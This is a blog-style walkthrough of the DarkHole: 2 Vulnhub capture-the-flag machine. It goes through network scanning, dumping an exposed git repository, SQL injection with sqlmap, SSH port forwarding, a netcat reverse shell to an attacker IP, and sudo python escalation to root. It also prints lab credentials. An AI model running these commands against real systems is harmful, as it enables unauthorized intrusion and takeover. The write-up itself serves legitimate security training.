DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is appropriate for certain experienced CTF players who want to test their talents in these settings. So, let's get started and figure out how to divide things down into small chunks.
Pentesting
Methodology
Network
Scanning
●
netdiscover
●
nmap
Enumeration
●
Abusing HTTP
●
gitdumper
tool
Exploitation
●
SQL injection
●
ssh
Privilege Escalation
●
linpass.sh
●
Netcat
reverse shell
●
User flag
●
bash history
●
Root flag
Level:
Medium-Hard
Network
Scanning
To
begin, we must use the netdiscover command to scan the network for the victim
machine's IP address.
netdiscover
Our
IP address is 192.168.1.179.
We are now initiating Nmap to advance in this
process. We did an aggressive scan (-A) for open port enumeration and
discovered the following ports information:
nmap -A 192.168.1.179
According to the Nmap output, we have
●
an SSH server
running on port 22
●
an HTTP
service running (Apache Server) on port 80, as well as an http-git page.
Enumeration
First,
we'll try to utilize HTTP. Let's check port 80 to see if anything interesting
comes up. Because the Apache Server is listening on port 80, we can immediately
verify it in the browser.
Except
for the login page, the site contains no useful information. So, we decided to
have a sneak peek at the login page.
Then we
decided to have a look at the http-git page that we discovered previously
during the Nmap aggressive scan.
We've
introduced a tool called gitdumper to improve the aesthetics of this http-git
page. It is a tool for acquiring a git repository from a website to gain a
better grasp of the data set.
We
simply use the git clone function to install this.
git
clone https://github.com/arthaud/git-dumper.git
cd
git-dumper
After
downloading the tool, we attempt to run it with python.
Another
thing we must do is offer them a directory name in which to save these git logs
(in our case we named this as a backup for this http-git page).
mkdir
backup
python3
git_dumper.py http://192.168.1.179/.git/
backup
After that, we accessed the backup directory,
and the log file had three entries. Using git, we opened one of the entries to
progress in this lab.
cd backup
git log
git diff a4d900a8d85e8938d3601f3cef113ee293028e10
Finally, we discovered the login page
credentials discovered before during http abuse.
Email:
lush@admin.com
Password: 321
Exploitation
We
were directed to a strange page after checking in on that page, which we
thought was suitable for SQL injection-related tactics.
So, we used a
burp suite to gather this page's cookies. It will be advantageous for our SQL
injection strategy.
These
cookies were saved in a file called "sql" using the nano command. We
initiated a sqlmap attack using this file, requesting the databases.
nano
sql
sqlmap
-r sql --dbs --batch
We obtained a few databases in a matter of
minutes. So, we initiated another command (using the -D parameter) for dumping
the database named darkhole_2.
sqlmap -r sql -D darkhole_2 --dump-all --batch
In
a matter of moments, we discovered ssh credentials for the user Jehad in this
dump database.
User: jehad
Pass: fool
Now,
using these ssh credentials, we logged in with the user Jehad and opened its id
to authenticate it.
ssh
jehad@192.168.1.179
id
Privilege Escalation
It's
time to start the privilege escalation process. We switched to the tmp folder
and tried to run the Linpeas script with curl. This is a script that searches
for potential paths to elevate privileges on Linux hosts and highlights them
for a better understanding of those instances with potential exploits.
curl
https://raw.githubusercontent.com/carlospalop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
| sh
After
running it, we saw that a PHP page for the user Losy was available on localhost
port 9999. As a result, we've devised a plan to use local port forwarding to go
to that page.
First,
we went to the previously mentioned directory and discovered an index.php file.
This tells us that we can get a command prompt (cmd) by using the previously
discussed local port forwarding method for the user losy.
cd
/opt/web
cat
index.php
It
is now time to launch this assault. We attempt to login as the jehad user,
using the details of local port forwarding provided in the above results we
achieved.
ssh
jehad@192.168.1.179 -L 9999:localhost:9999
Following
that, we saw the user losy's command prompt in the web browser. We authenticate
this by collecting this user's id.
Privilege
Escalation
Using a
netcat reverse shell on this browser as this user's cmd. We attempted a
standard methods command, but it did not work in this circumstance. So, we
attempted this attack after encoding it using the burp suite decoder.
rm /tmpf;mkfifo
/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.3:8888 >/tmp/f
After
that, we used a web browser and opened a Netcat listener on the opposite side
to catch the reverse shell.
nc -lvp 8888
python3 -c 'import pty; pty.spawn("/bin/bash")'
We obtained the user losy and the user flag of
this lab after capturing the reverse shell.
We discovered the bash history of this lab in
a folder, which can be quite beneficial in obtaining root.
cd /home/losy
cat user.txt
cat .bash_history
We discovered losy's login credentials in this
bash history file.
losy: gang
Following that, we tested this user's sudo
permissions. We discovered that we could reach the root using a python
one-liner.
Now
run this python one-liner with sudo and the losy credential.
sudo
python3 -c 'import pty; pty.spawn("/bin/bash")'
Hurray!!
We obtained the well as root flag. I must add that it was a great activity to
complete, and I applaud the author for creating this lab.
cat
root.txt
0 comments:
Post a Comment